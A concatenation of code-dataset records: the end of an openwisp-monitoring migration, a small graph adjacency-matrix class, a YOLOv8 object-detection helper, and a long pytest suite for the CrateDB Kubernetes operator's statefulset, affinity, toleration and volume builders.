Metric.objects.filter(configuration='config_applied').delete()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('check', '0006_rename_check_check_check_type'),\n swapper.dependency('monitoring', 'Metric'),\n ]\n\n operations = [\n migrations.RunPython(\n create_ping_checks, reverse_code=migrations.RunPython.noop\n ),\n migrations.RunPython(\n create_config_applied_checks, reverse_code=remove_config_applied_checks\n ),\n ]\n","repo_name":"openwisp/openwisp-monitoring","sub_path":"openwisp_monitoring/check/migrations/0007_create_checks.py","file_name":"0007_create_checks.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"52"} +{"seq_id":"19151921750","text":"import math\r\nimport sys\r\n\r\nclass AdjMatrixGraph:\r\n def __init__ (self):\r\n self.n = 0\r\n self.array = []\r\n self.arraynames = []\r\n\r\n def display (self):\r\n for x in range (self.n):\r\n for y in range (self.n):\r\n print (\"{0:2}\".format(self.array[x][y]), end=\" \")\r\n print( )\r\n print( )\r\n\r\n def insert (self, x, y, w):\r\n self.array[x][y] = int(w)\r\n \r\n def update(self):\r\n if len(self.array) < self.n:\r\n x = self.n - len(self.array)\r\n for q in range(0, x):\r\n for row in self.array:\r\n row.append(int(0))\r\n for q in range(0,x):\r\n new = []\r\n for y in range(self.n):\r\n new.append(int(0))\r\n self.array.append(new)\r\n\r\n def read(self, file):\r\n reader = open(file, \"r\")\r\n for line in reader:\r\n q = str(line).split()\r\n try:\r\n x = self.arraynames.index(q[0])\r\n except:\r\n x = self.n\r\n self.n += 1\r\n self.arraynames.append(q[0])\r\n try:\r\n y = self.arraynames.index(q[2])\r\n except:\r\n y = self.n\r\n self.n += 1\r\n self.arraynames.append(q[2])\r\n self.update()\r\n self.array[x][y] = (int(q[1]) - int(q[3]))\r\n self.array[y][x] = (int(q[3]) - int(q[1]))\r\n \r\n\r\ndef main():\r\n graph = AdjMatrixGraph()\r\n graph.read(input(\"Filename? \"))\r\n graph.display()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"apan64/basic-data-structures","sub_path":"Programming Assignment 4.py","file_name":"Programming Assignment 4.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25322889173","text":"import torch\nimport numpy as np\nfrom ultralytics import YOLO\nimport supervision as sv\n\nclass ObjectDetection:\n def __init__(self):\n self.device = 'cuda' if torch.cuda.is_available() else 'cpu'\n print(\"Using Device:\", self.device)\n self.model = self.load_model()\n self.CLASS_NAMES_DICT = self.model.model.names\n self.ball_boxes = []\n self.box_annotator = sv.BoxAnnotator(sv.ColorPalette.default(), thickness=3, text_thickness=3, text_scale=1.5)\n\n def load_model(self):\n model = YOLO(\"yolov8m.pt\") # load a pretrained YOLOv8n model\n model.fuse()\n return model\n\n def predict(self, frame):\n results = self.model(frame)\n return results\n\n def plot_bboxes(self, results, frame):\n xyxys = []\n confidences = []\n class_ids = []\n xyxy = []\n # Extract detections for person class\n for result in results:\n boxes = result.boxes.cpu().numpy()\n class_id = boxes.cls\n conf = boxes.conf\n xyxy = boxes.xyxy\n\n if any(class_id) == 0.0:\n xyxys.append(result.boxes.xyxy.cpu().numpy())\n confidences.append(result.boxes.conf.cpu().numpy())\n class_ids.append(result.boxes.cls.cpu().numpy().astype(int))\n\n # Setup detections for visualization\n detections = sv.Detections(\n xyxy=results[0].boxes.xyxy.cpu().numpy(),\n confidence=results[0].boxes.conf.cpu().numpy(),\n\n class_id=results[0].boxes.cls.cpu().numpy().astype(int),\n )\n\n for box, id in zip(xyxy, class_id):\n if id == 32: # class 0 corresponds to ball (modify this if necessary)\n self.ball_boxes.append(box)\n\n else:\n break\n #print(\"ball_box\", self.ball_boxes)\n\n # Annotate and display frame\n print('detections')\n print(class_id)\n print(type(xyxy))\n frame = self.box_annotator.annotate(scene=frame, detections=detections)\n return frame, box\n\n\n\n\n# import cv2\n# from object_detection import ObjectDetection\n#\n#\n# # Load sample input data (frame)\n# frame = cv2.imread(\"t.jpeg\")\n#\n# # Create an instance of ObjectDetection\n# object_detector = ObjectDetection()\n#\n# # Create an instance of ObjectDetection\n# object_detector = ObjectDetection()\n#\n# # Predict and plot bounding boxes\n# results = object_detector.predict(frame)\n# print(results[0])\n# frame_with_bboxes, box = object_detector.plot_bboxes(results, frame)\n#\n# # Save the frame with the ball box\n# cv2.imwrite(\"output.jpg\", frame_with_bboxes)\n","repo_name":"mohamedimem/AI","sub_path":"server_0/object_detection.py","file_name":"object_detection.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71656508645","text":"import logging\nimport string\nfrom os import walk\nfrom typing import Set\nfrom unittest import mock\n\nimport pytest\nfrom kubernetes_asyncio.client import AppsV1Api, CoreV1Api, CustomObjectsApi\n\nfrom crate.operator.config import config\nfrom crate.operator.constants import (\n API_GROUP,\n DATA_PVC_NAME_PREFIX,\n LABEL_COMPONENT,\n LABEL_MANAGED_BY,\n LABEL_NAME,\n LABEL_PART_OF,\n RESOURCE_CRATEDB,\n CloudProvider,\n)\nfrom crate.operator.create import (\n create_services,\n create_sql_exporter_config,\n create_statefulset,\n create_system_user,\n get_cluster_resource_limits,\n get_cluster_resource_requests,\n get_data_service,\n get_sql_exporter_config,\n get_statefulset_affinity,\n get_statefulset_containers,\n get_statefulset_crate_command,\n get_statefulset_crate_env,\n get_statefulset_crate_volume_mounts,\n get_statefulset_init_containers,\n get_statefulset_pvc,\n get_statefulset_volumes,\n get_tolerations,\n get_topology_spread,\n is_shared_resources_cluster,\n)\nfrom crate.operator.utils.formatting import b64decode, format_bitmath\n\nfrom .utils import CRATE_VERSION, assert_wait_for, do_pods_exist, start_cluster\n\n\n@pytest.fixture\ndef random_string(faker):\n def f():\n return \"\".join(faker.random_choices(string.ascii_letters + string.digits + \"-\"))\n\n return f\n\n\n@pytest.mark.k8s\n@pytest.mark.asyncio\nclass TestConfigMaps:\n async def does_configmap_exist(\n self, core: CoreV1Api, namespace: str, name: str\n ) -> bool:\n configmaps = await core.list_namespaced_config_map(namespace)\n return name in (c.metadata.name for c in configmaps.items)\n\n async def test_create(self, faker, namespace, api_client):\n core = CoreV1Api(api_client)\n name = faker.domain_word()\n await create_sql_exporter_config(\n None, namespace.metadata.name, name, {}, logging.getLogger(__name__)\n )\n await assert_wait_for(\n True,\n self.does_configmap_exist,\n core,\n namespace.metadata.name,\n f\"crate-sql-exporter-{name}\",\n )\n\n\nclass TestStatefulSetAffinity:\n def test_testing_true(self, faker):\n name = faker.domain_word()\n with mock.patch(\"crate.operator.create.config.TESTING\", True):\n affinity = get_statefulset_affinity(name, logging.getLogger(__name__), {})\n\n assert affinity is None\n\n def test_testing_false(self, faker):\n name = faker.domain_word()\n with mock.patch(\"crate.operator.create.config.TESTING\", False):\n affinity = get_statefulset_affinity(name, logging.getLogger(__name__), {})\n\n apa = affinity.pod_anti_affinity\n terms = apa.required_during_scheduling_ignored_during_execution[0]\n expressions = terms.label_selector.match_expressions\n assert [e.to_dict() for e in expressions] == [\n {\n \"key\": \"app.kubernetes.io/component\",\n \"operator\": \"In\",\n \"values\": [\"cratedb\"],\n },\n {\"key\": \"app.kubernetes.io/name\", \"operator\": \"In\", \"values\": [name]},\n ]\n assert terms.topology_key == \"kubernetes.io/hostname\"\n\n @pytest.mark.parametrize(\n \"node_spec\",\n [\n {\n \"name\": \"hot\",\n \"replicas\": 1,\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n \"requests\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n },\n },\n {\n \"name\": \"hot\",\n \"replicas\": 1,\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n },\n },\n {\n \"name\": \"hot\",\n \"replicas\": 1,\n \"resources\": {\"cpus\": 0.5, \"memory\": \"8589934592\"},\n },\n ],\n )\n def test_dedicated_resources_affinity(self, node_spec, faker):\n name = faker.domain_word()\n with mock.patch(\"crate.operator.create.config.TESTING\", False):\n affinity = get_statefulset_affinity(\n name, logging.getLogger(__name__), node_spec\n )\n\n apa = affinity.pod_anti_affinity\n terms = apa.required_during_scheduling_ignored_during_execution[0]\n expressions = terms.label_selector.match_expressions\n assert [e.to_dict() for e in expressions] == [\n {\n \"key\": \"app.kubernetes.io/component\",\n \"operator\": \"In\",\n \"values\": [\"cratedb\"],\n },\n {\"key\": \"app.kubernetes.io/name\", \"operator\": \"In\", \"values\": [name]},\n ]\n assert terms.topology_key == \"kubernetes.io/hostname\"\n\n @pytest.mark.parametrize(\n \"node_spec\",\n [\n {\n \"name\": \"hot\",\n \"replicas\": 1,\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n \"requests\": {\"cpu\": 0.25, \"memory\": \"8589934592\"},\n },\n },\n ],\n )\n def test_shared_resources_affinity(self, node_spec, faker):\n name = faker.domain_word()\n with mock.patch(\"crate.operator.create.config.TESTING\", False):\n affinity = get_statefulset_affinity(\n name, logging.getLogger(__name__), node_spec\n )\n\n na = affinity.node_affinity\n selector = na.required_during_scheduling_ignored_during_execution\n terms = selector.node_selector_terms[0]\n expressions = terms.match_expressions\n assert [e.to_dict() for e in expressions] == [\n {\n \"key\": \"cratedb\",\n \"operator\": \"In\",\n \"values\": [\"shared\"],\n }\n ]\n\n @pytest.mark.parametrize(\"provider\", [CloudProvider.AWS, CloudProvider.AZURE])\n def test_cloud_provider(self, provider, faker):\n name = faker.domain_word()\n with mock.patch(\"crate.operator.create.config.TESTING\", False):\n with mock.patch(\n \"crate.operator.create.config.CLOUD_PROVIDER\", provider.value\n ):\n topospread = get_topology_spread(name, logging.getLogger(__name__))\n\n terms = topospread[0]\n expressions = terms.label_selector.match_expressions\n assert [e.to_dict() for e in expressions] == [\n {\n \"key\": \"app.kubernetes.io/component\",\n \"operator\": \"In\",\n \"values\": [\"cratedb\"],\n },\n {\"key\": \"app.kubernetes.io/name\", \"operator\": \"In\", \"values\": [name]},\n ]\n assert terms.topology_key == \"topology.kubernetes.io/zone\"\n\n\nclass TestTolerations:\n def test_testing_true(self, faker):\n name = faker.domain_word()\n with mock.patch(\"crate.operator.create.config.TESTING\", True):\n tolerations = get_tolerations(name, logging.getLogger(__name__), {})\n\n assert tolerations is None\n\n @pytest.mark.parametrize(\n \"node_spec\",\n [\n {\n \"name\": \"hot\",\n \"replicas\": 1,\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n \"requests\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n },\n },\n {\n \"name\": \"hot\",\n \"replicas\": 1,\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n },\n },\n {\n \"name\": \"hot\",\n \"replicas\": 1,\n \"resources\": {\"cpus\": 0.5, \"memory\": \"8589934592\"},\n },\n ],\n )\n def test_dedicated_resources_tolerations(self, node_spec, faker):\n name = faker.domain_word()\n with mock.patch(\"crate.operator.create.config.TESTING\", False):\n tolerations = get_tolerations(name, logging.getLogger(__name__), node_spec)\n\n assert len(tolerations) == 1\n assert tolerations[0].to_dict() == {\n \"effect\": \"NoSchedule\",\n \"key\": \"cratedb\",\n \"operator\": \"Equal\",\n \"toleration_seconds\": None,\n \"value\": \"any\",\n }\n\n @pytest.mark.parametrize(\n \"node_spec\",\n [\n {\n \"name\": \"hot\",\n \"replicas\": 1,\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n \"requests\": {\"cpu\": 0.25, \"memory\": \"8589934592\"},\n },\n },\n ],\n )\n def test_shared_resources_tolerations(self, node_spec, faker):\n name = faker.domain_word()\n with mock.patch(\"crate.operator.create.config.TESTING\", False):\n tolerations = get_tolerations(name, logging.getLogger(__name__), node_spec)\n\n toleration = tolerations[0]\n expected = {\n \"key\": \"cratedb\",\n \"operator\": \"Equal\",\n \"value\": \"shared\",\n \"effect\": \"NoSchedule\",\n }\n assert expected.items() <= toleration.to_dict().items()\n\n\nclass TestStatefulSetContainers:\n def test(self, faker, random_string):\n cpus = faker.pyfloat(min_value=0)\n memory = faker.numerify(\"%!!\") + \".0\" + faker.lexify(\"?i\", \"KMG\")\n node_spec = {\n \"resources\": {\n \"requests\": {\"cpu\": cpus, \"memory\": memory},\n \"limits\": {\"cpu\": cpus, \"memory\": memory},\n }\n }\n c_sql_exporter, c_crate = get_statefulset_containers(\n node_spec,\n 1,\n 2,\n 3,\n 4,\n 5,\n \"foo/bar:1.2.3\",\n [\"/path/to/some/exec.sh\", \"--with\", \"args\"],\n [],\n [],\n )\n assert c_sql_exporter.name == \"sql-exporter\"\n assert len(c_sql_exporter.volume_mounts) == 1\n\n assert c_crate.command == [\"/path/to/some/exec.sh\", \"--with\", \"args\"]\n assert c_crate.image == \"foo/bar:1.2.3\"\n assert c_crate.name == \"crate\"\n assert c_crate.resources.to_dict() == {\n \"limits\": {\"cpu\": str(cpus), \"memory\": memory},\n \"requests\": {\"cpu\": str(cpus), \"memory\": memory},\n }\n\n\nclass TestStatefulSetCrateCommand:\n def test_entrypoint_first_item(self, random_string):\n cmd = get_statefulset_crate_command(\n namespace=random_string(),\n name=\"cluster1\",\n master_nodes=[\"data-node-0\", \"data-node-1\", \"data-node-2\"],\n total_nodes_count=3,\n data_nodes_count=3,\n crate_node_name_prefix=\"data-node-\",\n cluster_name=\"my-cluster\",\n node_name=\"node\",\n node_spec={\n \"resources\": {\n \"requests\": {\"cpu\": 1},\n \"limits\": {\"cpu\": 1},\n \"disk\": {\"count\": 1},\n }\n },\n cluster_settings=None,\n has_ssl=False,\n is_master=True,\n is_data=True,\n crate_version=\"4.6.3\",\n )\n assert [\"/docker-entrypoint.sh\", \"crate\"] == cmd[0:2]\n\n def test_cluster_name(self, random_string):\n cluster_name = random_string()\n cmd = get_statefulset_crate_command(\n namespace=\"some-namespace\",\n name=\"cluster1\",\n master_nodes=[\"data-node-0\", \"data-node-1\", \"data-node-2\"],\n total_nodes_count=3,\n data_nodes_count=3,\n crate_node_name_prefix=\"data-node-\",\n cluster_name=cluster_name,\n node_name=\"node\",\n node_spec={\n \"resources\": {\n \"requests\": {\"cpu\": 1},\n \"limits\": {\"cpu\": 1},\n \"disk\": {\"count\": 1},\n }\n },\n cluster_settings=None,\n has_ssl=False,\n is_master=True,\n is_data=True,\n crate_version=\"4.6.3\",\n )\n assert f\"-Ccluster.name={cluster_name}\" in cmd\n\n def test_node_name(self, random_string):\n node_name = random_string()\n crate_node_name_prefix = random_string()\n cmd = get_statefulset_crate_command(\n namespace=random_string(),\n name=random_string(),\n master_nodes=[\"data-node-0\", \"data-node-1\", \"data-node-2\"],\n total_nodes_count=3,\n data_nodes_count=3,\n crate_node_name_prefix=crate_node_name_prefix,\n cluster_name=\"my-cluster\",\n node_name=node_name,\n node_spec={\n \"resources\": {\n \"requests\": {\"cpu\": 1},\n \"limits\": {\"cpu\": 1},\n \"disk\": {\"count\": 1},\n }\n },\n cluster_settings=None,\n has_ssl=False,\n is_master=True,\n is_data=True,\n crate_version=\"4.6.3\",\n )\n assert (\n f\"-Cnode.name={crate_node_name_prefix}$(hostname | rev | cut -d- -f1 | rev)\"\n in cmd\n )\n assert f\"-Cnode.attr.node_name={node_name}\" in cmd\n\n @pytest.mark.parametrize(\n \"total, data_nodes, quorum\",\n [(2, 1, 1), (3, 2, 2), (4, 3, 2), (5, 4, 3), (123, 122, 62)],\n )\n def test_node_counts(self, total, data_nodes, quorum):\n master_nodes = [\"node-0\"]\n cmd = get_statefulset_crate_command(\n namespace=\"some-namespace\",\n name=\"cluster1\",\n master_nodes=master_nodes,\n total_nodes_count=total,\n data_nodes_count=data_nodes,\n crate_node_name_prefix=\"node-\",\n cluster_name=\"my-cluster\",\n node_name=\"node\",\n node_spec={\n \"resources\": {\n \"requests\": {\"cpu\": 1},\n \"limits\": {\"cpu\": 1},\n \"disk\": {\"count\": 1},\n }\n },\n cluster_settings=None,\n has_ssl=False,\n is_master=True,\n is_data=True,\n crate_version=\"4.7.0\",\n )\n assert f\"-Cgateway.recover_after_data_nodes={quorum}\" in cmd\n assert f\"-Cgateway.expected_data_nodes={data_nodes}\" in cmd\n\n @pytest.mark.parametrize(\n \"total, quorum\", [(1, 1), (2, 2), (3, 2), (4, 3), (5, 3), (123, 62)]\n )\n def test_node_counts_deprecated_settings(self, total, quorum):\n cmd = get_statefulset_crate_command(\n namespace=\"some-namespace\",\n name=\"cluster1\",\n master_nodes=[\"node-0\", \"node-1\", \"node-2\"],\n total_nodes_count=total,\n data_nodes_count=total,\n crate_node_name_prefix=\"node-\",\n cluster_name=\"my-cluster\",\n node_name=\"node\",\n node_spec={\n \"resources\": {\n \"requests\": {\"cpu\": 1},\n \"limits\": {\"cpu\": 1},\n \"disk\": {\"count\": 1},\n }\n },\n cluster_settings=None,\n has_ssl=False,\n is_master=True,\n is_data=True,\n crate_version=\"4.6.3\",\n )\n assert f\"-Cgateway.recover_after_nodes={quorum}\" in cmd\n assert f\"-Cgateway.expected_nodes={total}\" in cmd\n\n @pytest.mark.parametrize(\"count\", [1, 2, 5])\n def test_disks_counts(self, count):\n cmd = get_statefulset_crate_command(\n namespace=\"some-namespace\",\n name=\"cluster1\",\n master_nodes=[\"node-0\", \"node-1\", \"node-2\"],\n total_nodes_count=3,\n data_nodes_count=3,\n crate_node_name_prefix=\"node-\",\n cluster_name=\"my-cluster\",\n node_name=\"node\",\n node_spec={\n \"resources\": {\n \"requests\": {\"cpu\": 1},\n \"limits\": {\"cpu\": 1},\n \"disk\": {\"count\": count},\n }\n },\n cluster_settings=None,\n has_ssl=False,\n is_master=True,\n is_data=True,\n crate_version=\"4.6.3\",\n )\n arg = \"-Cpath.data=\" + \",\".join(f\"/data/data{i}\" for i in range(count))\n assert arg in cmd\n\n @pytest.mark.parametrize(\"cpus, ceiled\", [(0.1, 1), (2.5, 3), (4, 4)])\n def test_cpus(self, cpus, ceiled):\n cmd = get_statefulset_crate_command(\n namespace=\"some-namespace\",\n name=\"cluster1\",\n master_nodes=[\"node-0\", \"node-1\", \"node-2\"],\n total_nodes_count=3,\n data_nodes_count=3,\n crate_node_name_prefix=\"node-\",\n cluster_name=\"my-cluster\",\n node_name=\"node\",\n node_spec={\n \"resources\": {\n \"requests\": {\"cpu\": cpus},\n \"limits\": {\"cpu\": cpus},\n \"disk\": {\"count\": 1},\n }\n },\n cluster_settings=None,\n has_ssl=False,\n is_master=True,\n is_data=True,\n crate_version=\"4.6.3\",\n )\n assert f\"-Cprocessors={ceiled}\" in cmd\n\n @pytest.mark.parametrize(\"master\", [True, False])\n @pytest.mark.parametrize(\"data\", [True, False])\n def test_master_data_flags(self, master, data):\n cmd = get_statefulset_crate_command(\n namespace=\"some-namespace\",\n name=\"cluster1\",\n master_nodes=[\"node-0\", \"node-1\", \"node-2\"],\n total_nodes_count=3,\n data_nodes_count=3,\n crate_node_name_prefix=\"node-\",\n cluster_name=\"my-cluster\",\n node_name=\"node\",\n node_spec={\n \"resources\": {\n \"requests\": {\"cpu\": 1},\n \"limits\": {\"cpu\": 1},\n \"disk\": {\"count\": 1},\n }\n },\n cluster_settings=None,\n has_ssl=False,\n is_master=master,\n is_data=data,\n crate_version=\"4.6.3\",\n )\n assert f\"-Cnode.master={str(master).lower()}\" in cmd\n assert f\"-Cnode.data={str(data).lower()}\" in cmd\n\n @pytest.mark.parametrize(\"ssl\", [True, False])\n def test_ssl(self, ssl):\n cmd = get_statefulset_crate_command(\n namespace=\"some-namespace\",\n name=\"cluster1\",\n master_nodes=[\"node-0\", \"node-1\", \"node-2\"],\n total_nodes_count=3,\n data_nodes_count=3,\n crate_node_name_prefix=\"node-\",\n cluster_name=\"my-cluster\",\n node_name=\"node\",\n node_spec={\n \"resources\": {\n \"requests\": {\"cpu\": 1},\n \"limits\": {\"cpu\": 1},\n \"disk\": {\"count\": 1},\n }\n },\n cluster_settings=None,\n has_ssl=ssl,\n is_master=True,\n is_data=True,\n crate_version=\"4.6.3\",\n )\n if ssl:\n assert \"-Cssl.http.enabled=true\" in cmd\n assert \"-Cssl.psql.enabled=true\" in cmd\n else:\n assert \"-Cssl.http.enabled=true\" not in cmd\n assert \"-Cssl.psql.enabled=true\" not in cmd\n\n def test_node_and_cluster_settings_may_override(self):\n cmd = get_statefulset_crate_command(\n namespace=\"some-namespace\",\n name=\"cluster1\",\n master_nodes=[\"node-0\", \"node-1\", \"node-2\"],\n total_nodes_count=3,\n data_nodes_count=3,\n crate_node_name_prefix=\"node-\",\n cluster_name=\"my-cluster\",\n node_name=\"node\",\n node_spec={\n \"resources\": {\n \"requests\": {\"cpu\": 1},\n \"limits\": {\"cpu\": 1},\n \"disk\": {\"count\": 1},\n },\n \"settings\": {\n \"auth.host_based.enabled\": \"node-override\",\n \"node.attr.node_setting\": \"node-override\",\n \"node.attr.some_node_setting\": \"node\",\n },\n },\n cluster_settings={\n \"auth.host_based.enabled\": \"cluster-override\",\n \"node.master\": \"cluster-override\",\n \"node.attr.some_cluster_setting\": \"cluster\",\n },\n has_ssl=False,\n is_master=True,\n is_data=True,\n crate_version=\"4.6.3\",\n )\n assert \"-Cauth.host_based.enabled=node-override\" in cmd\n assert \"-Cnode.attr.node_setting=node-override\" in cmd\n assert \"-Cnode.master=cluster-override\" in cmd\n assert \"-Cnode.attr.some_node_setting=node\" in cmd\n assert \"-Cnode.attr.some_cluster_setting=cluster\" in cmd\n\n @pytest.mark.parametrize(\n \"provider, url\",\n [\n (\n CloudProvider.AWS,\n \"http://169.254.169.254/latest/meta-data/placement/availability-zone\",\n ),\n (\n CloudProvider.AZURE,\n \"http://169.254.169.254/metadata/instance/compute/zone?api-version=2020-06-01&format=text\", # noqa\n ),\n ],\n )\n def test_zone_attr(self, provider, url):\n with mock.patch(\"crate.operator.create.config.CLOUD_PROVIDER\", provider):\n cmd = get_statefulset_crate_command(\n namespace=\"some-namespace\",\n name=\"cluster1\",\n master_nodes=[\"node-0\", \"node-1\", \"node-2\"],\n total_nodes_count=3,\n data_nodes_count=3,\n crate_node_name_prefix=\"node-\",\n cluster_name=\"my-cluster\",\n node_name=\"node\",\n node_spec={\n \"resources\": {\n \"requests\": {\"cpu\": 1},\n \"limits\": {\"cpu\": 1},\n \"disk\": {\"count\": 1},\n }\n },\n cluster_settings=None,\n has_ssl=False,\n is_master=True,\n is_data=True,\n crate_version=\"4.6.3\",\n )\n additional_args = \"\"\n if provider == CloudProvider.AZURE:\n additional_args = \" -H 'Metadata: true'\"\n assert f\"-Cnode.attr.zone=$(curl -s '{url}'{additional_args})\" in cmd\n\n @pytest.mark.parametrize(\n \"node_settings, cluster_settings\",\n [\n ({\"node.attr.zone\": \"test\"}, None),\n ({}, {\"node.attr.zone\": \"test\"}),\n ],\n )\n def test_zone_attr_with_override(self, node_settings, cluster_settings):\n with mock.patch(\n \"crate.operator.create.config.CLOUD_PROVIDER\", CloudProvider.AZURE\n ):\n cmd = get_statefulset_crate_command(\n namespace=\"some-namespace\",\n name=\"cluster1\",\n master_nodes=[\"node-0\", \"node-1\", \"node-2\"],\n total_nodes_count=3,\n data_nodes_count=3,\n crate_node_name_prefix=\"node-\",\n cluster_name=\"my-cluster\",\n node_name=\"node\",\n node_spec={\n \"resources\": {\n \"requests\": {\"cpu\": 1},\n \"limits\": {\"cpu\": 1},\n \"disk\": {\"count\": 1},\n },\n \"settings\": node_settings,\n },\n cluster_settings=cluster_settings,\n has_ssl=False,\n is_master=True,\n is_data=True,\n crate_version=\"4.6.3\",\n )\n assert \"-Cnode.attr.zone=test\" in cmd\n\n\nclass TestStatefulSetCrateEnv:\n def test_without_ssl(self, faker):\n memory = \"123Mi\"\n heap_ratio = 0.456\n node_spec = {\"resources\": {\"memory\": memory, \"heapRatio\": heap_ratio}}\n e_heap_size, e_java_opts = get_statefulset_crate_env(\n node_spec, 1234, 5678, None\n )\n assert e_heap_size.name == \"CRATE_HEAP_SIZE\"\n assert e_heap_size.value == \"58812530\"\n assert e_java_opts.name == \"CRATE_JAVA_OPTS\"\n assert \"-XX:+HeapDumpOnOutOfMemoryError\" in e_java_opts.value\n\n def test_with_ssl(self, faker):\n memory = \"123Mi\"\n heap_ratio = 0.456\n node_spec = {\"resources\": {\"memory\": memory, \"heapRatio\": heap_ratio}}\n keystore_key_password_key = faker.domain_word()\n keystore_key_password_name = faker.domain_word()\n keystore_password_key = faker.domain_word()\n keystore_password_name = faker.domain_word()\n ssl = {\n \"keystoreKeyPassword\": {\n \"secretKeyRef\": {\n \"key\": keystore_key_password_key,\n \"name\": keystore_key_password_name,\n }\n },\n \"keystorePassword\": {\n \"secretKeyRef\": {\n \"key\": keystore_password_key,\n \"name\": keystore_password_name,\n }\n },\n }\n (e_heap_size, e_java_opts, e_key_pw, e_pw) = get_statefulset_crate_env(\n node_spec, 1234, 5678, ssl\n )\n assert e_heap_size.name == \"CRATE_HEAP_SIZE\"\n assert e_heap_size.value == \"58812530\"\n assert e_java_opts.name == \"CRATE_JAVA_OPTS\"\n assert \"-XX:+HeapDumpOnOutOfMemoryError\" in e_java_opts.value\n assert e_key_pw.name == \"KEYSTORE_KEY_PASSWORD\"\n assert e_key_pw.value_from.secret_key_ref.key == keystore_key_password_key\n assert e_key_pw.value_from.secret_key_ref.name == keystore_key_password_name\n assert e_pw.name == \"KEYSTORE_PASSWORD\"\n assert e_pw.value_from.secret_key_ref.key == keystore_password_key\n assert e_pw.value_from.secret_key_ref.name == keystore_password_name\n\n\nclass TestStatefulSetCrateVolumeMounts:\n def test_without_ssl(self, faker):\n disks = faker.pyint(min_value=1, max_value=5)\n node_spec = {\"resources\": {\"disk\": {\"count\": disks}}}\n vm_jmxdir, vm_resource, *vm_data = get_statefulset_crate_volume_mounts(\n node_spec, None\n )\n assert vm_jmxdir.name == \"jmxdir\"\n assert vm_resource.name == \"debug\"\n assert [(vm.mount_path, vm.name) for vm in vm_data] == [\n (f\"/data/data{i}\", f\"{DATA_PVC_NAME_PREFIX}{i}\") for i in range(disks)\n ]\n\n def test_with_ssl(self, faker):\n disks = faker.pyint(min_value=1, max_value=5)\n node_spec = {\"resources\": {\"disk\": {\"count\": disks}}}\n vm_jmxdir, vm_resource, *vm_data, vm_ssl = get_statefulset_crate_volume_mounts(\n node_spec, {}\n )\n assert vm_jmxdir.name == \"jmxdir\"\n assert vm_resource.name == \"debug\"\n assert [(vm.mount_path, vm.name) for vm in vm_data] == [\n (f\"/data/data{i}\", f\"{DATA_PVC_NAME_PREFIX}{i}\") for i in range(disks)\n ]\n assert vm_ssl.name == \"keystore\"\n\n\nclass TestStatefulSetInitContainers:\n def test(self):\n c_init_sysctl, c_fetch_jmx, c_heapdump = get_statefulset_init_containers(\n \"foo/bar:1.2.3\"\n )\n assert c_init_sysctl.name == \"init-sysctl\"\n assert c_fetch_jmx.name == \"fetch-jmx-exporter\"\n assert c_heapdump.name == \"mkdir-heapdump\"\n\n\nclass TestStatefulSetInitContainerChownTrue:\n @pytest.mark.parametrize(\"provider\", [None, \"aws\", \"azure\"])\n def test(self, provider):\n with mock.patch(\"crate.operator.create.config.CLOUD_PROVIDER\", provider):\n _, _, c_heapdump = get_statefulset_init_containers(\"foo/bar:1.2.3\")\n assert c_heapdump.name == \"mkdir-heapdump\"\n chown_ignore_rc = \"|| true\"\n if provider == \"aws\":\n assert chown_ignore_rc in c_heapdump.command[2]\n if provider in {\"azure\", None}:\n assert chown_ignore_rc not in c_heapdump.command[2]\n\n\nclass TestStatefulSetPVC:\n def test(self, faker):\n count = faker.pyint(min_value=1, max_value=5)\n s = faker.numerify(\"%!!\") + \".0\" + faker.lexify(\"?i\", \"KMG\")\n storage_class = faker.domain_word()\n node_spec = {\n \"resources\": {\n \"disk\": {\n \"count\": count,\n \"size\": s + \"B\",\n \"storageClass\": storage_class,\n }\n }\n }\n pvcs = get_statefulset_pvc(None, node_spec)\n expected_pvcs = [f\"{DATA_PVC_NAME_PREFIX}{i}\" for i in range(count)]\n expected_pvcs.append(\"debug\")\n expected_sizes = [s] * count\n expected_sizes.append(format_bitmath(config.DEBUG_VOLUME_SIZE))\n expected_storage_class_name = [storage_class] * count\n expected_storage_class_name.append(config.DEBUG_VOLUME_STORAGE_CLASS)\n assert [pvc.metadata.name for pvc in pvcs] == expected_pvcs\n assert [\n pvc.spec.resources.requests[\"storage\"] for pvc in pvcs\n ] == expected_sizes\n assert [\n pvc.spec.storage_class_name for pvc in pvcs\n ] == expected_storage_class_name\n\n\nclass TestStatefulSetVolumes:\n def test_without_ssl(self, faker):\n name = faker.domain_word()\n v_sql_exporter, v_jmx = get_statefulset_volumes(name, None)\n assert v_sql_exporter.name == \"crate-sql-exporter\"\n assert v_jmx.name == \"jmxdir\"\n\n def test_with_ssl(self, faker):\n name = faker.domain_word()\n keystore_key = faker.domain_word()\n keystore_name = faker.domain_word()\n ssl = {\n \"keystore\": {\"secretKeyRef\": {\"key\": keystore_key, \"name\": keystore_name}}\n }\n v_sql_exporter, v_jmx, v_keystore = get_statefulset_volumes(name, ssl)\n assert v_sql_exporter.name == \"crate-sql-exporter\"\n assert v_jmx.name == \"jmxdir\"\n assert v_keystore.name == \"keystore\"\n assert v_keystore.secret.secret_name == keystore_name\n assert v_keystore.secret.items[0].to_dict() == {\n \"key\": keystore_key,\n \"mode\": None,\n \"path\": \"keystore.jks\",\n }\n\n\n@pytest.mark.k8s\n@pytest.mark.asyncio\nclass TestStatefulSet:\n async def does_statefulset_exist(\n self, apps: AppsV1Api, namespace: str, name: str\n ) -> bool:\n stss = await 